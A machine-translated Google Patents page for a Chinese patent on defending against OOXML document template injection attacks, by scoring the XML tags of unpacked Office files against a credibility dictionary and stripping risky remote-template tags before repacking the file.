CN117235716B - Unknown threat defense method and device for OOXML document template injection attack - Google Patents
Unknown threat defense method and device for OOXML document template injection attack Download PDFInfo
- Publication number
- CN117235716B CN117235716B CN202311508777.4A CN202311508777A CN117235716B CN 117235716 B CN117235716 B CN 117235716B CN 202311508777 A CN202311508777 A CN 202311508777A CN 117235716 B CN117235716 B CN 117235716B
- Authority
- CN
- China
- Prior art keywords
- threat
- file
- ooxml
- xml
- matching
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 238000002347 injection Methods 0.000 title claims abstract description 40
- 239000007924 injection Substances 0.000 title claims abstract description 40
- 238000000034 method Methods 0.000 title claims abstract description 38
- 230000007123 defense Effects 0.000 title claims abstract description 32
- 238000004422 calculation algorithm Methods 0.000 claims abstract description 16
- 241000700605 Viruses Species 0.000 claims abstract description 4
- 230000006835 compression Effects 0.000 claims description 15
- 238000007906 compression Methods 0.000 claims description 15
- 238000004590 computer program Methods 0.000 claims description 8
- 238000004140 cleaning Methods 0.000 claims description 7
- 230000014509 gene expression Effects 0.000 claims description 5
- 238000012795 verification Methods 0.000 claims description 5
- 230000002159 abnormal effect Effects 0.000 claims description 4
- 230000002265 prevention Effects 0.000 claims 1
- 230000002155 anti-virotic effect Effects 0.000 abstract description 3
- 238000011156 evaluation Methods 0.000 abstract description 2
- 238000012545 processing Methods 0.000 description 19
- 238000005516 engineering process Methods 0.000 description 8
- 238000010586 diagram Methods 0.000 description 6
- 238000001514 detection method Methods 0.000 description 5
- 230000008569 process Effects 0.000 description 5
- 238000004364 calculation method Methods 0.000 description 3
- 230000007547 defect Effects 0.000 description 3
- 230000006870 function Effects 0.000 description 3
- 239000000243 solution Substances 0.000 description 3
- 238000013461 design Methods 0.000 description 2
- 230000008030 elimination Effects 0.000 description 2
- 238000003379 elimination reaction Methods 0.000 description 2
- 238000012986 modification Methods 0.000 description 2
- 230000004048 modification Effects 0.000 description 2
- 230000003068 static effect Effects 0.000 description 2
- 230000005856 abnormality Effects 0.000 description 1
- 238000009825 accumulation Methods 0.000 description 1
- 238000004458 analytical method Methods 0.000 description 1
- 230000009286 beneficial effect Effects 0.000 description 1
- 230000006837 decompression Effects 0.000 description 1
- 230000000694 effects Effects 0.000 description 1
- 230000006872 improvement Effects 0.000 description 1
- 238000011835 investigation Methods 0.000 description 1
- 238000012544 monitoring process Methods 0.000 description 1
Abstract
The invention discloses an unknown threat defense method and device for OOXML document template injection attack; the XML tree of the key file possibly storing the malicious attack load is recursively analyzed again through restoring the file, the key label possibly carrying the malicious virus is analyzed, evaluated, deleted or recombined according to the preset credibility dictionary and the evaluation algorithm, so that the malicious file constructed by a hacker is destroyed, the aggressiveness of the malicious file is lost, and a user can avoid the risk of the injection attack of the file template of a phishing attacker to a great extent. The invention breaks the dead office that the traditional antivirus software can only detect, provides a brand-new defending scheme, has universality on the defending capability of malicious documents under the condition that the normal use of the documents by users is not affected basically, and can theoretically prevent all known template injection type attacks and attack means such as variant attacks, nday loopholes, 0day loopholes and the like.
Description
Technical Field
The invention relates to the technical field of computer security, in particular to an unknown threat defense method and device for injection attack of an OOXML document template.
Background
In the prior art, the static detection technology cannot effectively cope with unknown threats such as 0day loopholes, and the like, and the feature library updating has larger hysteresis, the dynamic detection technology also has the possibility of being bypassed by the dynamic killing-free technology, the malicious load has running conditions during dynamic running, the occurrence condition is difficult to expect, and the dynamic detection technology consumes system resources, influences the running efficiency and reduces the user experience;
therefore, the invention breaks the traditional thinking, starts from the content format of the data file, cleans the data file according to the preset credibility rule, ensures that the threat is reduced to the minimum before the file is not operated, has flexible preset mode, can realize the emphasis direction of availability and safety according to the self-defined credibility rule, can theoretically prevent 0day attack and other unknown threats of all template injection types under the most severe credibility condition, and can clean the known threats without opening the unknown file, and the malicious load can not obtain the execution authority when the unknown file is cleaned, thereby well avoiding the defects of the dynamic monitoring technology.
Disclosure of Invention
The invention aims to provide an unknown threat defense method and device for an OOXML document template injection attack, aiming at the defects of the prior art, so that a user can reduce the threat risk of the template injection attack in a document under the condition that the file is not opened.
In order to achieve the above object, the present invention provides an unknown threat defense method for an OOXML document template injection attack, comprising the steps of:
(1) Acquiring an OOXML document to be processed, and initializing a threat map and a credibility dictionary;
(2) Judging whether the OOXML document to be processed is an encrypted document or not; if yes, firstly, the password is released through a user or a computer program, and then the OOXML document to be processed is compressed and restored through a compression algorithm, so that various component files are obtained; otherwise, compressing and restoring the OOXML document to be processed directly through a compression algorithm to obtain various component files;
(3) Carrying out structure identification on the various component files to determine to which threat map the component files belong; traversing various component files according to a preset threat map, and storing the matched and incompletely trusted files into a list variable;
(4) Checking the availability of the files in the list variable through XML format standards, and eliminating the unavailable data of the unoccluded abnormal symbol tags in the files;
(5) Giving an initial credibility score to each XML tag in the file by analyzing the tag name of each XML tag based on a preset credibility dictionary; matching is carried out according to the label value corresponding to the XML label name and a matching rule, threat scores of the XML labels are given according to the matching quantity and the matching length during matching, and finally threat scores are obtained;
(6) Judging whether the threat score obtained in the step (5) is lower than a threshold value, if so, threat clearing is carried out on the XML tag in the file, namely, deleting the whole XML tag or modifying the tag value of the XML tag; otherwise, entering the step (8);
(7) Performing secondary verification, and repeating the step (5) and the step (6) until the threat score in the step (6) is greater than or equal to a threshold value;
(8) And repackaging and compressing all the processed component files through a compression algorithm, and restoring the OOXML file, wherein the OOXML file is the file subjected to virus load cleaning.
Further, in the step (1), the threat map is in a black list form, and the specified files possibly carrying attack loads are stored in a list form; the threat map is internally provided with credibility dictionaries used in different formats, and the threat map is initialized according to the format of the OOXML document to be processed; the confidence dictionary defines a set of tags that may be at risk for a threat, an initial confidence score, a matching rule for each tag value, and a scoring criteria based on length or number of matches are defined within each tag in the set of tags.
Further, in the step (2), the compression algorithm is based on the ECMA-376 Office Open XML format standard.
Further, in the step (3), the structure recognition of the component files includes structure recognition and name recognition.
Further, in the step (5), the matching rule includes regular expression matching and character string matching.
Further, in the step (5), the threat score is obtained by adding the credibility score of the initial XML tag to the threat score.
Further, the threshold is greater than or equal to 60.
In order to achieve the above purpose, the present invention also provides an unknown threat defense device for an OOXML document template injection attack, which includes one or more processors, and is configured to implement the above unknown threat defense method for an OOXML document template injection attack.
To achieve the above object, the present invention also provides an electronic device including a memory and a processor, the memory being coupled to the processor; the memory is used for storing program data, and the processor is used for executing the program data to realize the unknown threat defense method of the OOXML document template injection attack.
To achieve the above object, the present invention further provides a computer readable storage medium having stored thereon a computer program which, when executed by a processor, implements the unknown threat defense method of OOXML document template injection attack described above.
Compared with the prior art, the invention has the beneficial effects that:
1. unlike traditional detection technology for dynamic and static analysis of files, the method adopts an attack load clearing mode to uniformly destroy malicious attack loads of input files, actively attack, radically prevent possibility of attack implementation, and avoid technical defects that traditional antivirus software can only detect and has omission.
2. Compared with the traditional dynamic detection technology, the method does not need to open the document, and cannot trigger malicious attack in the process of disassembling and processing the document.
3. The invention breaks the dead office that the traditional antivirus software can only detect, provides a brand-new defending scheme, has universality on the defending capability of malicious documents under the condition that the normal use of the documents by users is not affected basically, and can theoretically prevent all known template injection type attacks and attack means such as variant attacks, nday loopholes, 0day loopholes and the like.
Drawings
In order to more clearly illustrate the technical solutions of the embodiments of the present invention, the drawings that are needed in the description of the embodiments will be briefly described below, it being obvious that the drawings in the following description are only some embodiments of the present invention, and that other drawings may be obtained according to these drawings without inventive effort to a person skilled in the art.
FIG. 1 is a schematic flow chart of the method of the present invention;
FIG. 2 is a schematic diagram of a label threat scoring process in accordance with the present invention;
FIG. 3 is a schematic diagram of a threat map configuration file according to the present invention;
FIG. 4 is a schematic diagram of an attack load of the template injection attack document according to the present invention;
FIG. 5 is a schematic view of the structure of the device of the present invention;
fig. 6 is a schematic diagram of an electronic device.
Detailed Description
Reference will now be made in detail to exemplary embodiments, examples of which are illustrated in the accompanying drawings. When the following description refers to the accompanying drawings, the same numbers in different drawings refer to the same or similar elements, unless otherwise indicated. The implementations described in the following exemplary examples do not represent all implementations consistent with the invention. Rather, they are merely examples of apparatus and methods consistent with aspects of the invention as detailed in the accompanying claims.
The terminology used herein is for the purpose of describing particular embodiments only and is not intended to be limiting of the invention. As used in this specification and the appended claims, the singular forms "a," "an," and "the" are intended to include the plural forms as well, unless the context clearly indicates otherwise. It should also be understood that the term "and/or" as used herein refers to and encompasses any or all possible combinations of one or more of the associated listed items.
It should be understood that although the terms first, second, third, etc. may be used herein to describe various information, these information should not be limited by these terms. These terms are only used to distinguish one type of information from another. For example, first information may also be referred to as second information, and similarly, second information may also be referred to as first information, without departing from the scope of the invention. The word "if" as used herein may be interpreted as "at … …" or "at … …" or "responsive to a determination", depending on the context.
The present invention will be described in further detail with reference to the accompanying drawings and examples. It should be understood that the present invention may be embodied in many different forms and should not be construed as limited to the embodiments set forth herein. Rather, these embodiments are provided so that this disclosure will be thorough and complete, and will fully convey the scope of the invention to those skilled in the art. In addition, the technical features of the embodiments described below may be combined with each other as long as they do not collide with each other.
The unknown threat defense method and the unknown threat defense device for the OOXML document template injection attack provided by the invention can reduce the threat risk of the template injection attack in the document under the condition that the document is not opened by a user.
Referring to fig. 1, the unknown threat defense method for the OOXML document template injection attack provided by the invention comprises the following steps:
step one: and acquiring an OOXML document to be processed, and initializing a threat map and a credibility dictionary.
Specifically, reading a custom configuration file, wherein each file type has an independent credibility dictionary, each dictionary is provided with different matching rules and corresponding tag threat score calculation rules for tags which possibly appear, and initializing a threat map and the credibility dictionary, wherein the threat map (thread_map) adopts a black list form, and the specified files possibly carrying attack loads (payload) are stored in a list form for traversal cleaning; the threat map is internally provided with specific dictionaries (namely credibility dictionaries) used in different formats, and can be initialized into threat maps with different contents according to the different formats of the OOXML documents to be processed; the reliability dictionary (thread_subject) defines a tag set which may have threat risk, each tag in the reliability dictionary defines an initial reliability score thereof, and then defines a matching rule of each tag value, wherein the matching rule comprises regular expressions, character string matching and the like, and defines a scoring standard based on the length or the matching times; setting a special threat disposal rule, and for a specific label, the specific label cannot evaluate the malicious degree by using a score accumulation form, and clearing a specific processing mode is specified, for example: the direct culling of the solution without counting its scores is not limited to a particular operation of the solution body processing logic.
Step two: judging whether the OOXML document to be processed is an encrypted document or not; if yes, firstly, the password is released through a user or a computer program, and then the OOXML document to be processed is compressed and restored through a compression algorithm, so that various component files are obtained; otherwise, compressing and restoring the OOXML document to be processed directly through a compression algorithm to obtain various component files.
Specifically, the to-be-processed OOXML document is compressed and restored through the compression algorithm specified by the ECMA-376 Office Open XML format standard so as to facilitate subsequent processing, and the volume of the document can be effectively reduced by adopting the compression algorithm specified by the ECMA-376 Office Open XML format standard without any data loss. In the restore process, the file will be decompressed and restored into various types of component files, such as: in the file structure of the restored PowerPoint document, the files contained in the PPT file/PPT/_slides/_rels directory are one of the paths for storing remote templates, and because the format standard of OOXML prescribes that the component files are stored in the produced folders according to the specific folder structure. However, some input files may not be restored normally, and the files which cannot be restored normally may be discarded and recorded in the log for subsequent investigation and processing due to damage of the files themselves, non-compliance of the compression algorithm or lack of necessary identification information. In addition, for documents with cryptographic encryption, normal restoration at this step is also not possible. This is because Word or the like OOXML documents themselves provide cryptographic protection and require decryption before decompression. Therefore, the documents with the password encryption can be automatically decrypted by a user or by a computer program, and the OOXML documents to be processed are compressed and restored by a compression algorithm specified by the ECMA-376 Office Open XML format standard after decryption.
Step three: and carrying out structure identification on the various component files, determining to which threat map the various component files belong, traversing the various component files, and storing the matched and incompletely trusted files into a list variable according to a preset threat map.
Specifically, the structure of each type of compressed and restored component files is identified, such as doc, xls, ppt, and each type of file is different from the structure tree specified in the ECMA-376 Office Open XML format standard, so that it is required to determine which type of threat map the compressed and restored component files belong to according to the structure and names of each type of compressed and restored component files, traverse all files produced in the second step, traverse file products obtained by compressed and restored according to a preset threat map, and store the file products which are matched with the file products in the threat map into a list variable for traversing in the fourth step and the fifth step.
Step four: and checking the availability of the files in the list variable through XML format standards, and eliminating the unavailable data of the unoccluded abnormal symbol tags in the files.
Specifically, the availability of the file is checked through XML format standards, unusable data such as unclosed and abnormal symbol labels in the file are removed, and the content availability and the content integrity of the file are checked before scoring is input, so that the probability of triggering abnormality of a processing module in an unknown attack form is reduced.
Step five: giving an initial credibility score to each XML tag in the file by analyzing the tag name of each XML tag based on a preset credibility dictionary; and matching according to the tag values corresponding to the XML tag names, matching through regular expressions and matching rules of character strings, giving threat scores of the XML tags according to the matching quantity and matching length when matching is carried out according to different matching rules, and finally obtaining threat scores.
Specifically, according to a preset credibility dictionary, comparing XML label names and XML label values in a file, and according to different calculation rules, giving out the threat scores of the final population of the labels; after the file is input, the initial credibility score is given to the file by analyzing the names of all the labels in the file according to the credibility dictionary, and the score is taken from a section of [0,100 ]; matching regular expressions, character strings and other matching rules through the tag values, and giving tag threat scores according to the matching quantity and the matching length of different matching rules; e.g., a score calculation rule based on hit count: tag threat score = hit times risk multiple score basis; the final score for this tag (i.e., threat score) is derived by summing the initial confidence score and the tag threat score sum.
Step six: judging whether the threat score obtained in the fifth step is lower than a threshold value, if yes, threat clearing is carried out on the XML tag in the file, namely the whole XML tag is deleted or the tag value is modified; otherwise, step eight is entered.
Specifically, the whole tag is selectively deleted or the tag value of the XML tag of the file content is modified according to the threat score given in the step five, as shown in fig. 4, in an XML file in charge of storing templates, each Relationship tag contains three attributes of Target (path), type (Type), id (sequence). Wherein the Type attribute records the Type of the template, the Id attribute records the sequence of the template in the document, and the Target attribute records the path of the template, the step reads the threat elimination threshold through preset configuration, the higher the threshold represents the lower the tolerance to the threat, the lower the threshold represents the higher the requirement on the usability, for example: if the set threshold is greater than or equal to 60, the score given by each threat tag after threat assessment is determined to be at risk of template injection attack if the score is lower than 60, and in this step, the tag value of the tag is cleared or the whole tag is removed to achieve the effect of preventing unknown attack, for example: in most cases, the "document templates and the loading items" are too specialized, and the common user basically does not use a scene similar to the VBA macro, but is the mainstream technology of the current template injection attack, so that the risk is extremely high, and the remote template tags matched in the step five are given extremely low scores in the scene and deleted in the step, so that attack invalidation can be effectively realized.
Step seven: and (3) performing secondary verification, and repeating the step (5) and the step (6) until the threat score in the step (6) is greater than or equal to a threshold value.
Specifically, if the content is deleted or modified in the step six (i.e. if any label is lower than the security scoring threshold), performing secondary verification, returning to the step five, and re-performing risk score evaluation and attack load cleaning steps until the threat cleaning module considers that the input content is sufficiently secure, outputting a result without any cleaning, and entering the next step in a completely trusted state, where the purpose of the step is to defend against common avoidance means of hackers such as payload double write bypassing.
The secondary verification includes: comparing the consistency of the file input and output to evaluate the security and determine whether threat elimination is needed again; and multiplexing the threat scoring in the fifth step and the threat clearing in the sixth step of the invention for the output file which possibly has risks after the threat clearing, thereby realizing the countermeasures of evading common double-write attack loads of hackers and the like.
Step eight: and repackaging and compressing all the processed files by a compression algorithm, and restoring the OOXML file to ensure that a user can directly open the processed file through normal Office software and restore the original file suffix of the processed file, wherein the obtained file is the file subjected to virus load cleaning.
Corresponding to the embodiment of the unknown threat defense method of the OOXML document template injection attack, the invention also provides an embodiment of the unknown threat defense device of the OOXML document template injection attack.
Referring to fig. 5, the unknown threat defense device for OOXML document template injection attack provided by the embodiment of the present invention includes one or more processors, which are configured to implement the unknown threat defense method for OOXML document template injection attack in the above embodiment.
The embodiment of the unknown threat defense device for the OOXML document template injection attack can be applied to any device with data processing capability, and the device with data processing capability can be a device or a device such as a computer. The apparatus embodiments may be implemented by software, or may be implemented by hardware or a combination of hardware and software. Taking software implementation as an example, the device in a logic sense is formed by reading corresponding computer program instructions in a nonvolatile memory into a memory by a processor of any device with data processing capability. In terms of hardware, as shown in fig. 5, a hardware structure diagram of an apparatus with any data processing capability where the unknown threat defense device for OOXML document template injection attack of the present invention is located is shown in fig. 5, and in addition to the processor, the memory, the network interface, and the nonvolatile memory shown in fig. 5, the apparatus with any data processing capability where the apparatus is located in the embodiment generally includes other hardware according to the actual function of the apparatus with any data processing capability, which is not described herein again.
The implementation process of the functions and roles of each unit in the above device is specifically shown in the implementation process of the corresponding steps in the above method, and will not be described herein again.
For the device embodiments, reference is made to the description of the method embodiments for the relevant points, since they essentially correspond to the method embodiments. The apparatus embodiments described above are merely illustrative, wherein the elements illustrated as separate elements may or may not be physically separate, and the elements shown as elements may or may not be physical elements, may be located in one place, or may be distributed over a plurality of network elements. Some or all of the modules may be selected according to actual needs to achieve the purposes of the present invention. Those of ordinary skill in the art will understand and implement the present invention without undue burden.
Corresponding to the embodiment of the unknown threat defense method of the OOXML document template injection attack, the embodiment of the application further provides an electronic device, which includes: one or more processors; a memory for storing one or more programs; the one or more programs, when executed by the one or more processors, cause the one or more processors to implement an unknown threat defense methodology for OOXML document template injection attacks as described above. As shown in fig. 6, a hardware structure diagram of any device with data processing capability, where the unknown threat defense method for injecting attacks into an OOXML document template provided in the embodiment of the present application is located, is except for a processor, a memory, a DMA controller, a disk, and a nonvolatile memory shown in fig. 6, where any device with data processing capability in the embodiment is located, generally may include other hardware according to an actual function of the any device with data processing capability, which is not described herein again.
Corresponding to the embodiment of the unknown threat defense method of the OOXML document template injection attack, the embodiment of the invention further provides a computer readable storage medium, wherein a program is stored on the computer readable storage medium, and when the program is executed by a processor, the unknown threat defense method of the OOXML document template injection attack in the embodiment is realized.
The computer readable storage medium may be an internal storage unit, such as a hard disk or a memory, of any of the data processing enabled devices described in any of the previous embodiments. The computer readable storage medium may be any device having data processing capability, for example, a plug-in hard disk, a Smart Media Card (SMC), an SD Card, a Flash memory Card (Flash Card), or the like, which are provided on the device. Further, the computer readable storage medium may include both internal storage units and external storage devices of any data processing device. The computer readable storage medium is used for storing the computer program and other programs and data required by the arbitrary data processing apparatus, and may also be used for temporarily storing data that has been output or is to be output.
The foregoing description of the preferred embodiments of the invention is not intended to be limiting, but rather to enable any modification, equivalent replacement, improvement or the like to be made within the spirit and principles of the invention.
The above embodiments are merely for illustrating the design concept and features of the present invention, and are intended to enable those skilled in the art to understand the content of the present invention and implement the same, the scope of the present invention is not limited to the above embodiments. Therefore, all equivalent changes or modifications according to the principles and design ideas of the present invention are within the scope of the present invention.
Claims (8)
1. An unknown threat defense method for an OOXML document template injection attack is characterized by comprising the following steps:
(1) Acquiring an OOXML document to be processed, and initializing a threat map and a credibility dictionary; the threat map adopts a black list form, and a specified file possibly carrying attack load is stored in a list form; the threat map is internally provided with credibility dictionaries used in different formats, and the threat map is initialized according to the format of the OOXML document to be processed; the credibility dictionary defines a label set which possibly has threat risk, and each label in the label set defines an initial credibility score, a matching rule of each label value and a scoring standard based on length or matching times;
(2) Judging whether the OOXML document to be processed is an encrypted document or not; if yes, firstly, the password is released through a user or a computer program, and then the OOXML document to be processed is compressed and restored through a compression algorithm, so that various component files are obtained; otherwise, compressing and restoring the OOXML document to be processed directly through a compression algorithm to obtain various component files;
(3) Carrying out structure identification on the various component files to determine to which threat map the component files belong; traversing various component files according to a preset threat map, and storing the matched and incompletely trusted files into a list variable;
(4) Checking the availability of the files in the list variable through XML format standards, and eliminating the unavailable data of the unoccluded abnormal symbol tags in the files;
(5) Giving an initial credibility score to each XML tag in the file by analyzing the tag name of each XML tag based on a preset credibility dictionary; matching is carried out according to the label value corresponding to the XML label name and the matching rule, threat scores of the XML labels are given according to the matching quantity and the matching length during matching, and finally threat scores of the XML labels are obtained; the threat scores of the XML tags are obtained by adding the initial credibility scores and the threat scores of the XML tags;
(6) Judging whether the threat score obtained in the step (5) is lower than a threshold value, if so, threat clearing is carried out on the XML labels in the file, namely, the XML labels with the threat score lower than the threshold value are deleted or the label values are modified; otherwise, entering the step (8);
(7) Performing secondary verification, and repeating the step (5) and the step (6) until the threat score in the step (6) is greater than or equal to a threshold value;
(8) And repackaging and compressing all the processed component files through a compression algorithm, and restoring the OOXML file, wherein the OOXML file is the file subjected to virus load cleaning.
2. The unknown threat defense method for OOXML document template injection attacks of claim 1, wherein in the step (2), the compression algorithm is based on ECMA-376 Office Open XML format standard.
3. The unknown threat prevention method for an OOXML document template injection attack of claim 1, wherein in the step (3), the structure recognition of the various component files includes structure recognition and name recognition.
4. The unknown threat defense method for OOXML document template injection attacks of claim 1, wherein in said step (5), said matching rules comprise regular expression matching and string matching.
5. The unknown threat defense method for OOXML document template injection attacks of claim 1, wherein the threshold is greater than or equal to 60.
6. An unknown threat defense apparatus for an OOXML document template injection attack, comprising one or more processors configured to implement the unknown threat defense method for an OOXML document template injection attack of any of claims 1-5.
7. An electronic device comprising a memory and a processor, wherein the memory is coupled to the processor; wherein the memory is configured to store program data and the processor is configured to execute the program data to implement the unknown threat defense method of OOXML document template injection attacks of any of the above claims 1-5.
8. A computer readable storage medium having stored thereon a computer program, wherein the program when executed by a processor implements the unknown threat defense method of OOXML document template injection attacks of any of claims 1-5.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202311508777.4A CN117235716B (en) | 2023-11-14 | 2023-11-14 | Unknown threat defense method and device for OOXML document template injection attack |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202311508777.4A CN117235716B (en) | 2023-11-14 | 2023-11-14 | Unknown threat defense method and device for OOXML document template injection attack |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN117235716A CN117235716A (en) | 2023-12-15 |
| CN117235716B true CN117235716B (en) | 2024-02-13 |
Family
ID=89086461
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202311508777.4A Active CN117235716B (en) | 2023-11-14 | 2023-11-14 | Unknown threat defense method and device for OOXML document template injection attack |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN117235716B (en) |
Citations (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN106789091A (en) * | 2017-02-24 | 2017-05-31 | 中金金融认证中心有限公司 | The implementation method and device of a kind of Open XML documents digital signature and sign test |
| CN107948163A (en) * | 2017-11-29 | 2018-04-20 | 中科信息安全共性技术国家工程研究中心有限公司 | A kind of XML injection loopholes detection and defence method |
| CN114117419A (en) * | 2021-11-12 | 2022-03-01 | 苏州浪潮智能科技有限公司 | Template injection attack detection method, device, equipment and storage medium |
| CN116015777A (en) * | 2022-12-09 | 2023-04-25 | 杭州安恒信息技术股份有限公司 | Document detection method, device, equipment and storage medium |
| CN116126349A (en) * | 2023-04-18 | 2023-05-16 | 合肥高维数据技术有限公司 | OOXML document entrainment detection method, storage medium and electronic device |
| CN116150765A (en) * | 2023-02-28 | 2023-05-23 | 上海安般信息科技有限公司 | Fuzzy variation method and device based on API (application program interface) dependence |
| CN116975865A (en) * | 2023-08-11 | 2023-10-31 | 北京天融信网络安全技术有限公司 | Malicious Office document detection method, device, equipment and storage medium |
Family Cites Families (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20190385472A1 (en) * | 2015-09-21 | 2019-12-19 | Pearson Education, Inc. | Assessment item generation and scoring |
| US20230019180A1 (en) * | 2021-07-08 | 2023-01-19 | Bugcrowd Inc. | Automated Prediction Of Cybersecurity Vulnerabilities |
| US20230289435A1 (en) * | 2022-03-10 | 2023-09-14 | Denso Corporation | Incident response according to risk score |
-
2023
- 2023-11-14 CN CN202311508777.4A patent/CN117235716B/en active Active
Patent Citations (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN106789091A (en) * | 2017-02-24 | 2017-05-31 | 中金金融认证中心有限公司 | The implementation method and device of a kind of Open XML documents digital signature and sign test |
| CN107948163A (en) * | 2017-11-29 | 2018-04-20 | 中科信息安全共性技术国家工程研究中心有限公司 | A kind of XML injection loopholes detection and defence method |
| CN114117419A (en) * | 2021-11-12 | 2022-03-01 | 苏州浪潮智能科技有限公司 | Template injection attack detection method, device, equipment and storage medium |
| CN116015777A (en) * | 2022-12-09 | 2023-04-25 | 杭州安恒信息技术股份有限公司 | Document detection method, device, equipment and storage medium |
| CN116150765A (en) * | 2023-02-28 | 2023-05-23 | 上海安般信息科技有限公司 | Fuzzy variation method and device based on API (application program interface) dependence |
| CN116126349A (en) * | 2023-04-18 | 2023-05-16 | 合肥高维数据技术有限公司 | OOXML document entrainment detection method, storage medium and electronic device |
| CN116975865A (en) * | 2023-08-11 | 2023-10-31 | 北京天融信网络安全技术有限公司 | Malicious Office document detection method, device, equipment and storage medium |
Non-Patent Citations (3)
| Title |
|---|
| Automatic Generation of Tests to Exploit XML Injection Vulnerabilities in Web Applications;Sadeeq Jan等;IEEE Transactions on Software Engineering;335 - 362 * |
| 凌富.模板注入病毒攻击美国基础设施事件分析.计算机与网络.2017,全文. * |
| 模板注入病毒攻击美国基础设施事件分析;凌富;计算机与网络;全文 * |
Also Published As
| Publication number | Publication date |
|---|---|
| CN117235716A (en) | 2023-12-15 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US10375086B2 (en) | System and method for detection of malicious data encryption programs | |
| US9215197B2 (en) | System, method, and computer program product for preventing image-related data loss | |
| US8713681B2 (en) | System and method for detecting executable machine instructions in a data stream | |
| EP3899770B1 (en) | System and method for detecting data anomalies by analysing morphologies of known and/or unknown cybersecurity threats | |
| US8484737B1 (en) | Techniques for processing backup data for identifying and handling content | |
| US9230111B1 (en) | Systems and methods for protecting document files from macro threats | |
| US20110041179A1 (en) | Malware detection | |
| US9239922B1 (en) | Document exploit detection using baseline comparison | |
| US20180101682A1 (en) | System and method for detecting malicious compound files | |
| JP2019518298A (en) | Virus detection technology benchmarking | |
| JP2019079492A (en) | System and method for detection of anomalous events on the basis of popularity of convolutions | |
| CN107871089B (en) | File protection method and device | |
| Stolfo et al. | Fileprint analysis for malware detection | |
| RU2726878C1 (en) | Method for faster full antivirus scanning of files on mobile device | |
| US20200218809A1 (en) | Logical and Physical Security Device | |
| Rosenberg et al. | Bypassing system calls–based intrusion detection systems | |
| Cen et al. | Ransomware early detection: A survey | |
| CN117235716B (en) | Unknown threat defense method and device for OOXML document template injection attack | |
| Al-Mousa et al. | General countermeasures of anti-forensics categories | |
| US20220058261A1 (en) | System and method for identifying a cryptor that encodes files of a computer system | |
| Mahboubi et al. | Digital immunity module: Preventing unwanted encryption using source coding | |
| Fenu et al. | Computer forensics between the italian legislation and pragmatic questions | |
| CN112464235A (en) | Computer network safety control system and control method | |
| Adegbehingbe et al. | Assessing the Impact of Matched Fragments' Relative Locations on Application Artifact Inference | |
| Jeyaseeli et al. | Design of an Efficient Smart Phone Data Extraction Tool Using Aho-Corasick Algorithm. |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |